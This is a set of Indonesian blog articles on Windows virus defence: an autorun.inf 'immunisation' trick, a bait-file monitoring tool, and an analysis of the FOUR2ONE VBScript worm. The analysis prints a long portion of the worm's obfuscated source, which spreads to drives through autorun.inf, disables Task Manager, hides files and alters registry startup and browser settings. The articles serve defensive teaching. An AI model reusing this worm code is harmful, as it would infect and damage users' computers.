Jika Anda ingin membaca artikel-artikel lain, silahkan kunjungi www.tri-amperiyanto.blogspot.com atau www.cybersufi-online.co.cc. Terima kasih.

[If you want to read more articles, please visit : www.tri-amperiyanto.blogspot.com atau www.cybersufi-online.co.cc. Thank you.]


salam,
Tri Amperiyanto

Imunisasi autorun.inf

By Tri Amperiyanto


Virus akan berusaha menyebarkan dirinya dengan berbagai cara.  Salah satunya adalah mengeksploitasi file yang bernama Autorun.inf.  Sehingga saat suatu flashdisk dicolokkan ke komputer, maka sang virus akan aktif dan menyebarkan dirinya, jika pada komputer tersebut fitur autorun Windows aktif. 
Celakanya, secara default fitur autorun Windows ini dalam setingan aktif.  Maka virus akan dengan mudah menyerang.

Tentang Autorun.inf 

Agar dapat melakukan fungsi autorun (menjalankan file tertentu saat suatu media removable dipasangkan pada komputer), Windows memerlukan suatu file yang bernama autorun.inf.   File ini tak lebih dari suatu file teks biasa yang berisi beberapa perintah pengaktifan suatu program. 
File ini umum dipasangkan pada suatu removable media seperti  CD.  Sehingga saat CD dimasukkan ke CD DRIVE, akan  ada  suatu file program khusus yang dijalankan secara otomatis, sesuai dengan yang didefinisikan dalam file autorun.inf.  Nama file EXE khusus ini secara standar akan bernama autorun.exe.
Pembuat virus biasanya akan secara kreatif  memanfaatkan file tersebut.  Isi dari file  autorun.inf  yang semula bertuliskan perintah :
open = autorun.exe
yang bertujuan mengaktifkan file autorun.exe, akan  diubah agar berfungsi untuk menjalankan file virus.   Misalnya menjadi :
open=virusku.exe.
Dengan cara ini, saat disk removable tersebut dimasukkan ke sistem komputer, maka file virusku.exe akan dijalankan oleh Windows.  Akibatnya ?   virus akan aktif dan menyerang sistem komputer yang mengaktifkannya.
Pada praktek sesungguhnya, virus akan membuat file autorun.inf pada SETIAP drive yang ada.  Jadi tidak hanya di removable drive/disk saja.  Akibatnya setiap kali pemakai mengakses drive tersebut, berarti ia mengaktifkan program virus tersebut. 

Konsep dasar trik

Trik yang akan dilakukan sederhana saja. Yaitu menggagalkan pembentukan file autorun.inf  ! Dengan kegagalan dibentuknya file tersebut,  maka virus tidak akan dengan gampang menyebarkan dirinya via removable disk (flashdisk) biarpun file execute virus sudah ada di flashdisk.  Karena pemicu file execute virus ada pada file autorun.inf.
Ada beberapa pendekatan yang dapat mewujudkan trik ini.  Pertama, membuat file autorun.inf dan memproteksi atributnya dengan system, hidden, dan readonly. Dengan adanya file ini, maka akan sedikit memblokir file autorun.inf yang akan dibentuk oleh virus.  Namun demikian pendekatan model ini tidak disarankan untuk dilakukan.  Karena virus akan dengan mudah mengubah atribut file dan menindih file tersebut dengan file yang baru dengan nama yang sama.
Kedua, membuat suatu folder (directory) dengan nama autorun.inf.  Saat suatu file autorun.inf akan dibentuk, maka Windows akan menolaknya. Karena nama tersebut telah dipakai sebagai nama suatu folder. Pendekatan kedua inilah yang akan dipakai.

Praktek lapangan

Untuk mempermudah pemahaman, anggap saja trik ini dilakukan pada drive C:.  Panggil Windows Explorer dan pergilah ke root directory C. Lalu klik kanan pada bagian kosong di panel sebelah kanan Windows Explorer.  Menu konteks akan muncul saat klik kanan ditekan, lalu pilih New folder.
Suatu folder baru akan muncul.  Ketikkan namanya dengan data : autorun.inf dan tekan Enter. Folder baru dengan nama autorun.inf akan terbentuk.

Langkah selanjutnya, klik kanan pada folder tersebut. Saat menu konteks muncul pilih Properties.  Klik pilihan Read only dan Hidden, sehingga aktif tercentang. Dan klik OK untuk menyimpan setingan.  Dengan cara ini, folder autorun.inf akan menjadi tersembunyi dan hanya dapat dibaca saja.


 
Gambar :  Mengubah atribut folder

Untuk memeriksa apakah trik berjalan dengan benar, masih pada root directory C, klik kanan pada sembarang panel kosong, sehingga menu konteks muncul dan memilih New  lalu pilih  Text Document.




 Gambar :  membuat file teks  via menu konteks

Suatu file teks baru akan muncul.  Lalu berilah nama  autorun.inf dan tekan Enter.
 
Yang terjadi adalah muncul jendela pesan kesalahan yang menyatakan bahwa Windows tidak dapat membuat file dengan nama tersebut, karena telah dipergunakan.  Dan gagallah pembuatan file teks dengan nama autorun.inf.  Jika hal ini yang terjadi, maka sukses sudah trik yang sedang dibuat.  Jika nanti virus menyerang dan akan membuat file yang bernama autorun.inf, maka dapat dipastikan akan terjadi kegagalan.  Terhentilah pulalah penyebaran otomatis virus.

 


Gambar vak5. pesan error, karena file autorun.inf gagal dibentuk


Memperaman trik

Untuk lebih memperaman trik ini, pasangkanlah satu atau dua file dengan nama sembarang dalam folder autorun.inf.  Misalnya dibuat file teks dengan nama PENJAGA.TXT.
Pindah ke folder autorun.inf yang telah dibuat sebelumnya.  Setelah folder aktif, klik kanan sehingga menu konteks muncul, dan pilih notepad.  Ganti nama teks dokumen baru dengan nama PENJAGA.TXT.

Klik ganda file Penjaga.txt tersebut dan ketikkan sembarang data.  Tujuannya adalah agar file tidak 0 ukurannya.

Setelah disimpan, klik kanan pada file tersebut. Saat menu konteks muncul pilih Hidden dan Readonly.  Tujuannya agar file bersifat tersembunyi dan hanya dapat dibaca saja.

Untuk memperaman proses “imunisasi”,  dapat dibuat suatu folder baru lagi dalam folder autorun.inf.  Tujuannya adalah sebagai level pengaman tambahan.  Sehingga folder autorun, tidak dengan begitu gampang dihapus oleh virus.
Ingat teori menghapus folder ? Untuk dapat menghapus suatu folder, maka folder tersebut harus dikosongkan dahulu isinya.  Jika folder tidak kosong, maka folder tersebut akan gagal dihapus.

Anggap saja, folder baru yang dibuat bernama LEVEL2. 
Klik kanan folder level2, dan ubah atributnya menjadi Readonly dan Hidden.  Tujuannya ?  tentu saja untuk mempersulit folder autorun.inf dihapus.

Jika Anda tipe seorang paranoid, tentu saja akan membuat suatu file teks tambahan dengan sembarang nama dan data.  Dengan demikian folder Level2 pun akan mempunyai file. Cara ini, akan membuat kekuatan “imunisasi” akan lebih ampuh karena akan memaksa virus untuk bekerja lebih keras lagi dalam menghapus folder autorun.inf.
 

Pasang dimana ?

Sebenarnya, tujuan utama trik ini adalah untuk melindungi flashdisk agar tidak dapat disisipi file autorun.inf virus. Namun demikian, demi tambahan keamanan, pasangkanlah juga pada setiap partisi drive yang ada pada harddisk. Seperti drive C, D, E dst.  Untuk mempercepat proses pembentukan “vaksin” ini, cukup Anda Copy folder autorun.inf yang telah dibuat dan paste pada drive atau removable drive yang ingin diimunisasi.
Mengapa perlu memasang “vaksin” pada setiap drive yang ada ? Karena beberapa virus lokal akan memasangkan juga file autorun.inf ini pada setiap drive yang ada. Sehingga saat suatu drive diakses, virus akan langsung aktif  (karena efek autorun) dan melakukan manipulasinya.  Efek samping jika file tersebut dipasangkan oleh virus di hard disk, partisi (drive) yang terkena tidak akan dapat dilihat isinya dengan sekadar melakukan klik ganda. Untuk melihat isinya Anda harus melakukan klik kanan dan memilih Explore atau Open.

Pengembangan Trik

Tentunya tidak ada yang melarang, jika Anda secara paranoid membuat satu atau bahkan 20 folder baru tambahan folder dan teks penjaga.  Sesuaikanlah dengan rasa aman dan nyaman Anda.  Karena hal tersebut akan makin memperkuat proses “imunisasi” autorun.inf.
Trik sederhana ini tentu saja masih dapat dikembangkan lagi, jika Anda kehendaki.  Misalnya dengan menambahkan pengamanan karakter ASCII non standar / UNICODE pada nama folder penjaganya (folder yang bernama LEVEL2). Atau mungkin membuat suatu program bantu sederhana yang mewakili  ribet-nya membuat folder dan teks pengaman.  Selamat mencoba.

 CyberSufi KamiKaze [CSKK]

 Program sederhana pemantau serangan virus

By Tri Amperiyanto

CyberSufi KamiKaze [CSKK] adalah suatu program yang berguna untuk memantau keutuhan suatu file target (file umpan). Tujuan utama dari program ini adalah untuk menjebak virus agar menginfeksi atau mengganggu file target tersebut. Jika file umpan target berubah atau tidak ada, maka CSKK akan segera menampilkan suatu pesan peringatan (setiap 1 menit), bahwa telah terjadi perubahan pada file umpan. Oleh karena misi file target ini "berani mati" mengorbankan dirinya sendiri, maka program ini bernama KamiKaze ..

secara default CSKK akan memantau keutuhan dari file umpan yang bernama KAMI.EXE dan KAZE.DOC, yang ditempatkan oleh program difolder C:\CS\KK. Namun demikian, Anda dapat dengan bebas menambahkan file-file umpan lainnya (maksimal 4 file). Sehingga jebakan akan lebih efektif dalam bekerja. Program ini akan membantu program Anti Virus yang ada, dalam menghadapi virus baru yang tidak dikenal atau lolos dari cekalan AV. Selamat menjebak virus ..

Install Program Jalankan Install program - InstallCSKK.EXE. Program akan diinstal di folder : \CS\KK. Buka folder tersebut, dan jalankan file CSKK.EXE. Program akan aktif dalam bentuk icon pada system tray. Klik Kanan Icon tersebut untuk melihat menu dan mengatur setingnya.

Gambar : Menu utama CSKK

Menu Utama CSKK 

Exit Menu - Untuk keluar dari menu pop up

Matikan CSKK - untuk mengakhiri program CSKK

Pesan Sponsor - promosi singkat

Aktifkan CSKK saat Booting - Membuat CSKK langsung diaktifkan saat windows dihidupkan

Atur Setingan CSKK - Mengatur setingan CSKK 2. Mengatur Setingan CSKK Pada bagian ini Anda dapat mengatur setingan tambahan file umpan. File umpan yang dapat diatur sejumlah empat. Tentukan file dan letaknya sesuai dengan kebutuhan.

Misalnya Anda akan memasangkan file notepad.exe yang ada pada folder c:\windows. caranya :

* Klik kanan icon CSKK yang ada pada systemtray.

* Pilih Atur setingan CSKK.

* Saat keluar konfirmasi, klik Yes.

* Jendela pengaturan muncul.

* klik File. Jendela pemilihan file muncul.

* Untuk menampilkan folder target, klik DIR, dan Anda dapat memilih folder target secara visual.

* Pilih C:\windows.

* Lalu klik Data, maka file-file akan muncul.

* Pilih file target (notepad.exe).

* Lalu klik OK. Jendela pengaturan akan kembali muncul.

* klik SET untuk mengkonfirmasi pemilihan data tersebut.

* Untuk menghapus setingan yang sudah ada klik tombol Hapus.

* Keluar dari jendela dengan mengklik tanda silang (X).

Saat terjadi perubahan pada file yang dilindungi (standar dan non standar), akan keluar pesan peringatan. Dengan program ini diharapkan pemakai dapat mengetahui serangan virus secara dini dan segera melakukan tindakan pemeriksaan pada komputernya.

gambar : tampilan pesan peringatan CSKK

Begitu saja. Semoga program ini berguna dan digunakan..

Program dapat diambil di section download.

Kritik, saran, dan cacian dapat dikirim ke email.

Virulogi : worm-scripting dengan teknik enkripsi sebagian

By Tri Amperiyanto

Worm (virus) lokal yang dibuat dengan teknik Scripting (memakai VBS) dapat dilihat listing programnya secara langsung. Dengan demikian jika pemakai berkesempatan mencekal file script nakal tersebut, maka ia akan dapat mencermati dan mempelajarinya.
Pembuat worm tahu persis akan hal tersebut. Oleh karena itu ia akan menerapkna sedikit enkripsi pada lsiting program virusnya. Dengan harapan apabila file tesb kena cekala, maka pemakai akan kesulitan dalanm menterjemahkannya.
Untuk lebih mengenal dan memahami skrip-skrip berbahaya tersebut, akan diulas bagaimana suatu script worm sederhana dengan teknik enkripsi sederhana bekerja. Sebagai model, akan diambil satu script worm sesungguhnya yang banyak beredar. File worm ini bernama FOUR2ONE.VIRUS.

Cara kerja

Worm (virus) script, pada saat aktif, dengan bantuan fasilitas standar scripting Windows – WSH (windows scripting host)/WSCRIPT atau CSCRIPT, akan membuat file dengan nama Recycle.bin, yang merupakan script utama.  
Jika file ini diaktifkan, maka ia akan membuat file autorun.inf, file HTML dan beberapa file VBS lainnya. Yang pada prakteknya akan saling bahu membahu menjaga eksistensi worm.
Berikut ini adalah petikan dari script yang menunjukkan cara kerja program nakal tersebut. Pembahasan tidak akan terlalu detail dan teknis, hanya memberikan keterangan global dari beberapa script. Untuk pemahaman lebih jauh, silahkan dicermati dan dianalisis sendiri secara mandiri.


Inisialisasi awal script

Pertama kali script (program) akan melakukan perintah klasik untuk menangani kesalahan program. Pengaturan beberapa variabel pendukung script akan dibuat.  

on error resume next
dim rekur,syspath,windowpath,desa,twoone,mf,misi,tf,four2,nt,check,sd, Dn,Wd,Hn,Mn,nae, viti,ld,gap,nowd, recy

Kemudian script akan mempersiapkan variabel yang berisi data-data file pendukung yang akan dibuat oleh virus. Variabel misi untuk membuat file Autorun.inf. variabel html untuk membuat file html pemicu. Dan variabel ini diisi dengan data yang dienkrip. Sebagai contoh untuk variabel misi isinya adalah sebagai berikut.

misi = ReAd( "^ovspuvb\" ) & vbcrlf & ReAd( "tcw/fmdzdfs!fyf/uqjsdtx>fuvdfyfmmfit" )


Dapat dilihat data-data yang diletakkan pada variabel misi tersebut dienkrip dengan data-data yang aneh. Jika data tersebut didecode, isinya sebenaranya hanyalah data-data file autorun.inf standar.

[autorun]
Shellexecute=wscript.exe recycle.vsb.

Selain itu ada beberapa perintah program standar scripting yang mengalami modifikasi. Sebagai ilustrasi petikan perintah berikut :

set four2 = createobject( ReAd( "mmfiT/uqjsdTX")

Jika di-decode, sebenarnya adalah perintah standar : wscript.shell.

set four2 = createobject( "Wscript.shell")

dengan cara ini virus akan lebih sulit dideteksi oleh progam antivirus atau program berjenis script-stopper.


Beranak dan sembunyi

Virus setelah membuat file data stream untuk dirinya sendiri, maka akan menentukan pengaturan path untuk bekerja berikut data-data trigger tanggal manipulasi. Data trigger tanggal disimpan dalam file yang bernama localdate.dll. Petikan kodenya adalah :

viti=date*1+421000014.0421
set tf = twoone.createtextfile(windowpath & ReAd( "mme/fubembdpm]" ),false)
tf.write viti
tf.close
set tf = twoone.getfile(windowpath & ReAd( "mme/fubembdpm]" ))
tf.attributes = 39


Data stream file yang telah dipersiapkan akan dikopikan ke folder system32 dengan nama four2one.vbs. Tentu saja dengan atribut hidden, system, readonly dan archieve diset menjadi aktif. Diwakili dengan file attribut = 39. Angka 39 ini merupakan penjumlahan dari angka-angka atribut. Artinya file tersebut akan bersifat readonly (1) – hanya bisa dibaca, hidden (2) - tersembunyi, system (4) - sistem dan Archieve (32) - arsip. Dengan teknik ini maka file vbs tidak akan terlihat (bersembunyi) saat pemakai memakai Windows Explorer. Petikan kodenya :

set tf = twoone.getfile(syspath & ReAd( "tcw/fop3svpg]" ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( "tcw/fop3svpg]" ),2,true)
tf.write rekur
tf.close

Dengan teknik yang sama virus juga akan membuat file cadangan dengan nama Fortuna.dll dan explorer.vbs yang juga disimpan di folder system (system32). Masih pada folder yang sama, file HTML virus akan dibuat dengan nama Google.htm. dan mengkopikan file google.jpg dari folder system32 ke root directory (c:\).


Pemeriksaan jenis drive

Selanjutnya script akan menangani setiap drive yang ada pada sistem komputer. Jika jenis drive sama dengan 1 (= removable) atau 2 (= fixed) dan pathnya tidak sama dengan A: atau C:, program akan mengopikan file script aktif ke drive tersebut dengan nama recycle.bin. 

for each desa in twoone.drives
If (desa.drivetype = 1 or desa.drivetype = 2) and desa.path <>"A:" and desa.path <>"C:" then

set tf=twoone.getfile(desa.path & ReAd( "ojc/fmdzdfS]" ))
tf.attributes =39
set tf=twoone.createtextfile(desa.path & ReAd( "ojc/fmdzdfS]" ),2,true)
tf.write rekur
tf.close

Selain itu, script juga akan membuat file autorun.inf dan recycle.vbs dengan prosedur yang mrip dengan pembentukan file recycle.bin.



Manipulasi Registry 

Tahapan selanjutnya, virus akan melakukan beberapa memanipulasi Registry. Petikan kodenya : 

set four2 = createobject( ReAd( "mmfiT/uqjsdTX") )
four2.regwrite ReAd( "topjuqPsfempGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]
txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ),"1",ReAd("ESPXE`HFS")


Kode ini memanipulasi Folder options, dengan menuliskan data di subkey Registry :

HKCU\Software\Microsoft\windows\Current Version\policies\explorer
Langkah yang hampir sama dilakukan untuk beberapa manipulasi Registry lainnya. Data-data Registry yang dimanipulasi adalah sebagai berikut :
Mematikan taskmanager- dengan ini maka worm akan sulit dimatikan prosesnya.
Membuat status Hidden selalu aktif. – dengan ini worm akan selalu tersembunyi dari tampilan.
Membuat masukan autorun standar. Dengan cara ini, maka worm akan ikut dikatifkan saat booting awal Windows.
Membuat ekstension file tersembunyi – dengan cara ini pemakai keslutian menentukan jenis file yang ada. Misalnya exe, txt, com dll.
Mengubah bentuk icon file standar vbs. – ini untuk meneglabui pemakai
Selain itu, program juga akan membelokkan pemakaian program regedit dan msconfig, sehingga saat kedua program tersebut diaktifkan yang terbuka adalah program notepad.
Tidak hanya itu, program juga akan memanipulasi mouse. Juga mengarahkan program startpage Internet explorer untuk menampilkan file google.htm.
Yang cukup menjengkelkan, saat mengakses folder worm akan mengaktifkan file skripnya sebelum mengaktifkan Windows explorer (dengan bantuan file explorer.vbs).
Worm juga akan meninggalkan pesan di MRU list.
Worm akan memanipulasi screensaver dengan menampilkan pesannya via screensaver 3DText Windows.
Jika tanggal 5 dan di atas jam 12, maka komputer akan dishutdown.
Setiap menit ke 9, 19, 29, 39, 49 dan 59 akan mengkopi data \recent\*.jpg.lnk ke desktop dan menjalankan Internet Explorer. Ini sama saja dengan mengaktifkan file google.htm, karena startpage IE telah diambil alih.


Trik pengulangan skrip

Script akan menunda proses infeksi, jika jenis drive script aktif tidak sama 1 (removable disk), selama beberapa waktu. Lalu melakukan proses perputaran pengulangan script. 

if check <> 1 then
Wscript.sleep 80000
end if
loop while check<>1

Jika kriteria drive tersebut tidak terpenuhi, skrip akan diulang lagi dan lagi.  

set sd = createobject(ReAd( "mmfit/uqjsdtX" ))
sd.run windowpath & ReAd( "!-udfmft0-f0!fyf/sfspmqyf]" ) & Wscript.ScriptFullname


Bagaimana enkripsi dilakukan ?

Worm ini melakukan enkripsi data dengan bantuan fungis yang bernama ReAd. Fungsi ini akan membaca satu persatu karakter dan mengubahnya menjadi karakter ASCII – 1 dengan perintah ASC. Selanjuntya hasilnya baru diubah menjadi karakter dengan bantuan perintah CHR. Petikan kodenya sebagai berikut :

Function ReAd( WriTe )
  Dim Son, ToLo, Yo
  Son = ""
  For ToLo = 1 To Len( WriTe )
  Yo = Mid( WriTe, ToLo, 1 )
  Son = Chr( Asc( Yo ) - 1 ) & Son 
  Next
  ReAd = Son
End Function

Jika Anda berminat mencermati listing program, Anda harus melakukan decoding sendiri dengan membuat suatu file VBS denagn perintah Msgbox untuk menampilkan data, yang sebelumnya telah diberi masukan fungsi ReAd plus data yang akan dibaca. Sebagai ilustrasi perintahnya adalah :

Msgbox (ReAd( "!-udfmft0-f0!fyf/sfspmqyf]" )

Dengan cara tersebut data-data yang dienkripsi akan dapat dibaca.

Listing program 

Listing berikut ini adalah listing asli program worm yang berhasil ditangkap. File aslinya bernama Recycle.bin. Disajikan secara teks dan apa adanya. Silahkan dicermati.

'four2one.virus ver 2.0

on error resume next
dim rekur,syspath,windowpath,desa,twoone,mf,misi,tf,four2,nt,check,sd, Dn,Wd,Hn,Mn,nae, viti,ld,gap,nowd, recy

misi = ReAd( "^ovspuvb\" ) & vbcrlf & ReAd( "tcw/fmdzdfs!fyf/uqjsdtx>fuvdfyfmmfit" )

html = ReAd( "?#86!;uihjfi!<576!;iuejx!<722!;ugfm!<93!;qpu!<fuvmptcb!;opjujtpq#>fmzut!wje=?#111111$#>spmpdhc!zepc=" ) & vbcrlf &_
 ReAd( "?wje0=?q0=?uopg0=1/3!sfw!!fop3svpg!n(j?#8#>f{jt!#fuspG#>fdbg!#DDDDDD$#>spmpd!uopg=?#sfuofd#>ohjmb!q=" ) & vbcrlf &_
 ReAd( "?#2.!;yfeoj.{!<79!;qpu!<112!;ugfm!<fuvmptcb!;opjujtpq#>fmzut!obqt=?#sfuofd#>ohjmb!q=" ) & vbcrlf &_
 ReAd( "?obqt0=?#115#>uihjfi!#117#>iuejx!#HQK/922:521K0SPD17CVQ0USBQJMD0fdjggP!ugptpsdjN0tfmjG!nbshpsQ0;D#>dst!#1#>sfespc!hnj=" ) & vbcrlf &_
 ReAd( "?#2!;yfeoj.{!<79!;qpu!<112!;ugfm!<fuvmptcb!;opjujtpq#>fmzut!obqt=" ) & vbcrlf &_
 ReAd( "?q0=?#sfuofd#>ohjmb!q=?q0=?obqt0=?#115#>uihjfi!#117#>iuejx!#hqk/fmhpph]34nfutzt]txpeojx];d#>dst!#1#>sfespc!hnj=" ) & vbcrlf &_
 ReAd( "?#73!;uihjfi!<576!;iuejx!<722!;ugfm!<2:5!;qpu!<fuvmptcb!;opjujtpq#>fmzut!wje=" ) & vbcrlf &_
 ReAd( "?#sfuofd#>ohjmb!q=?wje0=?q0=?c0=?uopg0=9113!mjsqB!82?#DDDDDD$#>spmpd!#5#>f{jt!#lppcmppidT!zsvuofD#>fdbg!uopg=?c=?#sfuofd#>ohjmb!q=" )

explor= ReAd( "uyfo!fnvtfs!spssf!op" ) & vbcrlf & _
 ReAd( "qx!-et!-fnbOxfO!-fnbOemP!njE" ) & vbcrlf & _
 ReAd( "*#udfkcPnfutzTfmjG/hojuqjsdT#)udfkcpfubfsd!>!pd!uft" ) & vbcrlf & _
 ReAd( "*#mmfit/uqjsdtX#)udfkcpfubfsd!>!et!uft" ) & vbcrlf & _
 ReAd( "*1)sfempgmbjdfqtufh/pd!>!qx!ufT" ) & vbcrlf & _
 ReAd( "#mme/bovuspG]34nfutzt]txpeojx];d#!>!fnbOemP" ) & vbcrlf & _
 ReAd( "#tcw/fop3svpg]34nfutzt]txpeojx];d#!>!fnbOxfO" ) & vbcrlf & _
 ReAd( "ftmbg!-fnbOxfO!-fnbOemP!fmjgzqpd/pd" ) & vbcrlf & _
 ReAd( "ofiu!96!>!sfcnvO/ssF!gj" ) & vbcrlf & _
 ReAd( "ftmf" ) & vbcrlf & _
 ReAd( "#tcw/fop3svpg]34nfutzt]txpeojx];d#!ovs/et" ) & vbcrlf & _
 ReAd( "!gj!eof" ) & vbcrlf & _
 ReAd( "#fyf/sfspmqyf]#!'!qx!ovs/et" )

recy = ReAd( "uyfo!fnvtfs!spssf!op" ) & vbcrlf & _
 ReAd( "qx!-et!-fnbOxfO!-fnbOemP!njE" ) & vbcrlf & _
 ReAd( "*#udfkcPnfutzTfmjG/hojuqjsdT#)udfkcpfubfsd!>!pd!uft" ) & vbcrlf & _
 ReAd( "*#mmfit/uqjsdtX#)udfkcpfubfsd!>!et!uft" ) & vbcrlf & _
 ReAd( "*1)sfempgmbjdfqtufh/pd!>!qx!ufT" ) & vbcrlf & _
 ReAd( "#ojc/fmdzdfS]#!>!fnbOemP" ) & vbcrlf & _
 ReAd( "#tcw/fop3svpg]34nfutzt]txpeojx];d#!>!fnbOxfO" ) & vbcrlf & _
 ReAd( "ftmbg!-fnbOxfO!-fnbOemP!fmjgzqpd/pd" ) & vbcrlf & _
 ReAd( "ofiu!96!>!sfcnvO/ssF!gj" ) & vbcrlf & _
 ReAd( "ftmf" ) & vbcrlf & _
 ReAd( "#tcw/fop3svpg]34nfutzt]txpeojx];d#!ovs/et" ) & vbcrlf & _
 ReAd( "!gj!eof" ) & vbcrlf & _
 ReAd( "fnbommvGuqjsdT/uqjsdtX!'!#!-udfmft0-f0!fyf/sfspmqyf]#!'!qx!ovs/et" )

set twoone = createobject(ReAd( "udfkcPnfutzTfmjG/hojuqjsdT" ))
set mf = twoone.getfile (Wscript.ScriptFullname)
set four2 = createobject( ReAd( "mmfiT/uqjsdTX") )
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
 
Wd = weekday(Now)
Hn = hour(now)
Mn = minute(now)

Set windowpath = twoone.getspecialfolder(0)
Set syspath = twoone.getspecialfolder(1)

viti=date*1+421000014.0421
set tf = twoone.createtextfile(windowpath & ReAd( "mme/fubembdpm]" ),false)
tf.write viti
tf.close
set tf = twoone.getfile(windowpath & ReAd( "mme/fubembdpm]" ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( "tcw/fop3svpg]" ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( "tcw/fop3svpg]" ),2,true)
tf.write rekur
tf.close
set tf = twoone.getfile(syspath &ReAd( "tcw/fop3svpg]" ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( "mme/bovuspG]" ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( "mme/bovuspG]" ),2,true)
tf.write rekur
tf.close
set tf = twoone.getfile(syspath & ReAd( "mme/bovuspG]" ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( "tcw/sfspmqyf]" ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( "tcw/sfspmqyf]" ))
tf.write explor
tf.close
set tf = twoone.getfile(syspath & ReAd( "tcw/sfspmqyf]" ))
tf.attributes = 39

set tf=twoone.createtextfile(syspath & ReAd( "nui/fmhpph]" ),2,true)
tf.write html
tf.close
set tf = twoone.getfile(syspath & ReAd( "nui/fmhpph]" ))
tf.attributes=39

twoone.CopyFile syspath & ReAd( "hqk/fmhppH]" ), "c:\", true
twoone.CopyFile syspath & ReAd( "nui/fmhppH]" ), "c:\", true

for each desa in twoone.drives
If (desa.drivetype = 1 or desa.drivetype = 2) and desa.path <>"A:" and desa.path <>"C:" then

set tf=twoone.getfile(desa.path & ReAd( "ojc/fmdzdfS]" ))
tf.attributes =39
set tf=twoone.createtextfile(desa.path & ReAd( "ojc/fmdzdfS]" ),2,true)
tf.write rekur
tf.close
set tf=twoone.getfile(desa.path & ReAd( "ojc/fmdzdfS]" ))
tf.attributes = 39

set tf=twoone.getfile(desa.path & ReAd( "tcw/fmdzdfS]" ))
tf.attributes =39
set tf=twoone.createtextfile(desa.path & ReAd( "tcw/fmdzdfS]" ),2,true)
tf.write recy
tf.close
set tf=twoone.getfile(desa.path & ReAd( "tcw/fmdzdfS]" ))
tf.attributes = 39

set tf =twoone.getfile(desa.path & ReAd( "goj/ovspuvb]" ))
tf.attributes = 32
set tf=twoone.createtextfile(desa.path & ReAd( "goj/ovspuvb]" ),2,true)
tf.write misi
tf.close
set tf = twoone.getfile(desa.path & ReAd( "goj/ovspuvb]" ))
tf.attributes=39

twoone.CopyFile syspath & ReAd( "hqk/fmhppH]" ), desa.path & "\", true
twoone.CopyFile desa.path & ReAd( "hqk/fmhppH]" ), syspath & "\", true
end if
next

set four2 = createobject( ReAd( "mmfiT/uqjsdTX") )
four2.regwrite ReAd( "topjuqPsfempGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ),"1",ReAd("ESPXE`HFS")
four2.regwrite ReAd( "shnltbUfmcbtjE]nfutzt]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ),"1",ReAd("ESPXE`HFS")
four2.regwrite ReAd( "ofeejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ),"0",ReAd("ESPXE`HFS")
four2.regwrite ReAd( "nfutzTugptpsdjN]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI" ), syspath & ReAd( "tcw/fop3svpg]" )

four2.regwrite ReAd( "fnbOfqzUzmeofjsG]fmjGTCW]UPPS`TFTTBMD`ZFLI" ), ReAd( "opjtofuyF!opjubdjmqqB" )
four2.regwrite ReAd( "uyFxpiTsfwfO]fmjGTCW]UPPS`TFTTBMD`ZFLI" ),""
four2.regwrite ReAd( "]opdJumvbgfE]fmjGTCW]UPPS`TFTTBMD`ZFLI" ), four2.RegRead (ReAd( "fmjgmme]UPPS`TFTTBMD`ZFLI" ) & ReAd( "]opdJumvbgfE]" ))
four2.regwrite ReAd( "eobnnpD]ujeF]mmfiT]fmjGTCW]UPPS`TFTTBMD`ZFLI" ), ""

four2.regwrite ReAd( "sfhhvcfe]fyf/ujefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ),ReAd( "fyf/ebqfupo" )
four2.regwrite ReAd( "sfhhvcfe]fyf/hjgopdtn]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ),ReAd( "fyf/ebqfupo" )

'four2.regwrite ReAd( "effqTldjmDfmcvpE]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI"), "1"

set mf = twoone.getfile(windowpath & ReAd( "mme/fubembdpm]" ))
set ld = mf.openastextstream(1)
dn = ld.readline
nowd=date*1+421000000.0421
gap=nowd-dn

if gap>0 Then
four2.regwrite ReAd( "fhbQ!usbuT]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ), ReAd( "nui/fmhppH];d" )
four2.regwrite ReAd( "]dfyffee]fspmqyf]mmfit]sfempG]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ),""
four2.regwrite ReAd( "]eobnnpd]fspmqyf]mmfit]sfempG]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ), ReAd( "tcw/sfspmqyf]34nfutzt]txpeojx];d!!fyf/uqjsdTX]34nfutzT]txpeojx];d" )
four2.regwrite ReAd( "b]VSNovS]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ), ReAd( "tvsjw/fop3svpg" )
four2.regwrite ReAd( "utjMVSN]VSNovS]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ), "a"
four2.regwrite ReAd( "uvPfnjUfwbToffsdT]qpultfE]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI" ),"60"
